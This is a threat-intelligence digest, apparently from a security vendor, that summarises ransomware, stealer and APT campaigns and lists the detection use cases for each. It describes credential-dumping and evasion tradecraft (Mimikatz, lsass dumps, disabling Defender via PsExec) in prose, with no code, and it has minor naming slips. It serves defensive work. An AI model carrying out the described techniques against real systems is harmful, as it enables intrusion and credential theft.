Colibri Loader

April 12, 2022

Malwarebytes provided analysis on Colibri Loader, a malware that emerged in underground forums in August 2021. The malware is advertised to “people who have large volumes of traffic and lack of time to work out the material.“

RedLine Stealer Spreading from Illegitimate Windows 11 Upgrade

February 15, 2022

RedLine Stealer spreading from illegitimate Windows 11 Upgrade

Industry: N/A | Level: Tactical | Source: HP – ThreatResearch

Threat Research from HP has identified the distribution of information-stealing malware, RedLine Stealer posing as an installer to Microsoft’s latest Windows 11 OS version. The threat campaign is recent, as one of the malicious domain windows-upgraded[.]com was registered on January 27th, 2022. The fraudulent Microsoft page drops a malicious zip file, “Windows11InstallationAssistant.zip” for users to click the download link. The zip file is hosted on Discord containing “six Windows DLLs, an XML file and a portable executable.” Upon execution of the malicious executable file, an encoded PowerShell command runs with a download of a jpg file following a 21-second timeout. The jpg file is actually a disguised DLL file. Once the DLL is loaded, the RedLine Stealer payload is active and able to proceed with data collection and exfiltration as desired by the attacker.

  • Anvilogic Scenario: InfoStealer Malware Behaviors
  • Anvilogic Use Cases:
    • Encoded Powershell Command
    • Query Registry

Phosphorus/APT32 New PowerLess Trojan

February 08, 2022

Phosphorus/APT32 New PowerLess Trojan

Industry: N/A | Level: Tactical | Source: Cybereason

Iranian group, Phosphorus/APT35/Charming Kitten, has been identified by Research from Cybereason, utilizing new PowerShell tool “PowerLess Backdoor,” while also exploiting log4shell vulnerabilities. The new malware comes with capabilities to download additional payloads for information stealing, however it’s unique with a new stealth technique as detailed from the report, “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic doesn’t prevent PowerShell events from being logged. The only instance in which a PowerShell process is spawned is when a process needs to be killed. Based on reviewed IOCs from Cybereason, the infrastructure utilized for the attack is highly active with an observed IP address having overlap with Memento Ransomware linking a potential connection between the threat actor group and ransomware.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell

Midas Ransomware

February 01, 2022

Midas Ransomware

Industry: Technology | Level: Tactical | Source: Sophos

Sophos reported, deployment of Midas ransomware against a technology vendor in December 2021. A review of the threat indicators identified the attackers were active on the network for at least two months with the earliest indicator of compromise found on October 13th, 2021. The organization’s network was unfortunately not complicated following a flat topology with no network segmentation. The attackers also took advantage of commercial remote access tools, AnyDesk and TeamViewer, to move laterally in the network as the organization had utilized the software previously for tests, however, did not uninstall them from the servers. Identified by Sophos a unique aspect of the compromise, involves the attackers crafting and installing PowerShell scripts as services prior to the deployment of ransomware. The activity was carefully engineered during the two months they were on the network. Due to a visibility gap, it is unknown how the attackers accessed the domain controller or obtained Admin permissions. Threat activity progressed slowly from October 13th to November 2nd and picked up again on November 25th with ransomware deployment on December 7th. Observed threat activity on the network included using process hacker to identify processes, Mimikatz for credential harvesting, execution of scripts from TEMP and AppData directories and exfiltrating data to a cloud service.

  • Anvilogic Use Cases:
    • Windows Service Created
    • Obfuscated Powershell Techniques
    • RDP Hijacking
    • Mimikatz
    • Executable Process from Suspicious Folder

BlueNoroff Cryptocurrency Focused APT Group

January 18, 2022

BlueNoroff Cryptocurrency Focused APT Group

Industry: Finance & Technology | Level: Operational | Source: Securelist

Kaspersky shared research for BlueNoroff, an APT group tracked by Kaspersky that seemingly has associations with Lazarus. Kaspersky began tracking the group after their 2016 attack on Bangladesh’s Central Bank. The group’s attack proficiency is most specialized in “the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own user, or other means.” The group’s activities this year appear to have been focused on cryptocurrency startups. The group communicates through services such as Google Drive or LinkedIn messages as an initial lure, delivering malicious documents either directly or a compressed file that would also contain an LNK file. The malicious document’s execution would launch PowerShell and/or a VBScript that conducts basic fingerprinting on the system before the threat actor proceeds with additional objectives such as collecting credentials or setting/stealing cryptocurrency, the group operates patiently to study the environment and blend their activities.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Suspicious File written to Disk
    • Windows Copy Files

Malicious Microsoft Exchange IIS Module Owowa

December 21, 2021

Malicious Microsoft Exchange IIS Module – Owowa

Industry: Government & Transportation | Level: Tactical | Source: SecureList

Kaspersky shared intelligence of a malicious implant targeting Outlook Web Access (OWA) applications of Exchange servers dubbed “Owowa.” The implant is capable of enabling remote command execution and capturing user credentials of users who successfully authenticate through OWA. The discovery of Owowa came about in late 2020 from sample submission to VirusTotal and from tracking with Kaspersky’s telemetry data. Since April 2021 the malware appears to circulate through parts of Europe, Malaysia, Mongolia, Indonesia, and the Philippines. The malicious add-in module uses the name “ExtenderControlDesigner” and is loaded through a PowerShell script.

  • Anvilogic Use Case: IIS Worker (W3WP) Spawn Command Line

ALPHV/BlackCat ransomware – Technical Information from Symantec

December 21, 2021

ALPHV/BlackCat ransomware – Technical Information from Symantec

Industry: N/A | Level: Operational | Source: Symantec

Emerging ALPHV/BlackCat ransomware, written in the Rust programming language, was examined by Symantec. An observed attack chain identified suspicious activity on a victim network on November 3rd, 2021 leading to the ransomwares deployment on November 18th. Initial activity on November 3rd started with suspicious SMB requests followed by a registry dump of the Local Security Authority (LSA). Shortly after, PsExec was executed it launched a command prompt disabling ‘RestrictedAdmin mode’ in the registry. The activity was silent until November 18th when PsExec disabled Windows Defender with PowerShell and added “*.exe” to an AV exclusion list. The ransomware was then deployed using PsExec. Symantec’s review of the samples identified the attack was specifically targeted at the victim organization as “victim’s administrative credentials are embedded as part of the configuration block”.

  • Anvilogic Scenario: Initial ALPHV/BlackCat Ransomware – Behaviors
  • Anvilogic Use Cases:
    • ProcDump Credential Harvest
    • Task Manager lsass Dump
    • Remote Admin Tools
    • Registry key added with reg.exe

Yanluowang Ransomware Linked to Thieflock Affiliate

December 01, 2021

Yanluowang Ransomware Linked to Thieflock Affiliate

Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec

Yanluowang ransomware group, active since at least August 2021, have been targeting US Corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to Theiflock ransomware attacks. Based on observations by Symantec, it seems there is a link, or a shifting of allegiances from Thieflock to the Yanluowang ransomware family. Notable noticed TTP patterns have been the usage of BazarLoader for initial access, PowerShell to download tools enabling RDP in the registry, Adfind for reconnaissance, and the usage of other various credential-stealing tools.

  • Anvilogic Scenario: Yanluowang Ransomware – Behaviors
  • Anvilogic Use Cases:
    • RDP Enabled
    • Adfind Execution
    • pypykatz commands

Cuba Ransomware

December 01, 2021

Cuba Ransomware

Industry: Critical Infrastructure | Level: Tactical | Source: FBI

The FBI released a flash report for Cuba ransomware based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to, financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to the Cuba ransomware. Threat actors utilize phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. Many legitimate Windows services are employed by the threat actors as well such as PowerShell, PsExec, in addition to leveraging Windows Admin privileges to execute their ransomware.

  • Anvilogic Scenario: Hancitor & Cuba Ransomware
  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • PSexec Service Creation
    • Remote Admin Tools

APT37 and Chinotto Malware

November 24, 2021

APT37 and APT37Malware

Industry: Media & Nonprofit | Level: Tactical | Source: SecureList

North Korean nation-state sponsored group APT37/ScarCruft/Temp.Reaper has been identified by Kaspersky for targeting South Korean journalists defectors, and human rights activists. The group utilized malware, Chinott, distributing through watering holes, spear-phishing emails, and smishing attacks. A news organization had data stolen and evidence found the attackers had access to their environment for several months. The malware versions were observed in PowerShell, Windows, and Android with similar command and control schemes based in HTTP. Additional malware capabilities observed the ability to modify registry keys (specifically enabling trust access for VBA), register a PowerShell command in the Run registry for persistence to execute an HTA file with mshta, and collect files staged a bat folder.

  • Anvilogic Scenario: APT37 & “Chinotto” Malware
  • Anvilogic Use Cases:
    • Query Registry
    • New AutoRun Registry Key
    • MSHTA.exe execution
    • Data Staged to File